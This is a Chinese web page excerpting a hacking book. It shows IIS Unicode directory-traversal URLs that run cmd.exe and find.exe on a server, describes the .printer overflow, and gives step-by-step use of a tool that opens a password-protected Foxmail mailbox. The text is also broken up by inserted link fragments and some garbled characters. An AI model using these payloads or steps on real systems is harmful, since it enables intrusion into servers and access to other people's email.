摘要:
6.9 unicode漏洞入侵(2)
6. 显示某一路径下相同文件类型的文件
如果要显示d盘inetpub\scripts\wwwroot下的相同文件类型,可在浏览器的地址栏中输入如下内容:
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.ht*
如图......
摘要:
6.5 printer溢出漏洞入侵
6.5 printer溢出漏洞入侵
关于printer漏洞原理,本书已在4.2.5小节 .printer漏洞修补中做了详细的介绍,由于.printer漏洞只有iis5.0(windows 2000 server)存在,所以入侵者通过此漏洞入侵计算机只会针对iis5.0进行,下面看看入侵者是如何利用.printer漏洞对服务器进行攻击的。
入侵者找到......
黑客攻防技术内幕-安全破解(6)
7.2 基于软件密码破解(2)
7.2.3 foxmail密码破解 【程序编程相关:
解读Linux系统文件权限的设置方法】 【推荐阅读:
网站服务器通用和专用保护方法比较分析】
1. 破解环境 【扩展信息:
黑客如何给你的系统种木马(2)】
foxmail是一款很出色的收发信件的共享软件,在公共场所多个人都可以使用同一个foxmail进行收发电子邮件,但是其加密方式还有待提高,接下来看看如何进入有密码保护的信箱.
所用操作系统:windows 98
foxmail版本:4.0
所用破解软件:foxmail杀手(支持foxmail 3.x.4.x)
2. 破解过程
(1) 先打开foxmail,选择要查看邮件的用户名,例如这里要进入l_63@163.com的信箱,选中l_63@163.com,如图7-37所示.
图7-37 选择要查看邮件的用户名
(2) 双击图标运行foxmail杀手,如图7-38所示.
图7-38 foxmail杀手界面
(3) 在foxmail杀手的界面上按下鼠标左键,当鼠标指针变成为图形时将其拖动到foxmail的用户列表窗口并再释放鼠标左键,此时foxmail打开对话框提示要输入口令,如图7-39所示,单击按钮即可进入了用户l_63@163.com的信箱,如图7-40所示.
图7-39 foxmail提示输入口令
图7-40 进入用户l_63@163.com的信箱
7.2.4 还原精灵密码破解
还原精灵是一款由台湾开发的还原系统数据资料的优秀还原软件.当安装此软件后,根据用户需要可以对系统数据进行完全还原,一般情况下在网吧广泛使用此软件.用户为给还原精灵设置密码保护以防他人恶意破坏,但是其密码是明文密码,存在内存中,在用户忘了密码的情况下,可以借助第三方软件找出还原精灵中的明文密码.接下来看看如何来查找还原精灵存放在内存中的明文密码.
破解环境:
软件版本:还原精灵21st 5.0
破解平台:windows 2000 professional
所用软件:winhex 10.0汉化版...
下一页 摘要:
6.9 unicode漏洞入侵(3)
6.9.2 利用unicode漏洞攻击网站
(1) 入侵者在手工或是使用扫描工具找到有unicode漏洞的服务器后,在浏览器中输入:
http://目标机/scripts/..á�../winnt/system32/cmd.exe?/c+dir+c:\
或
http://目标机/scripts/..à/../w......
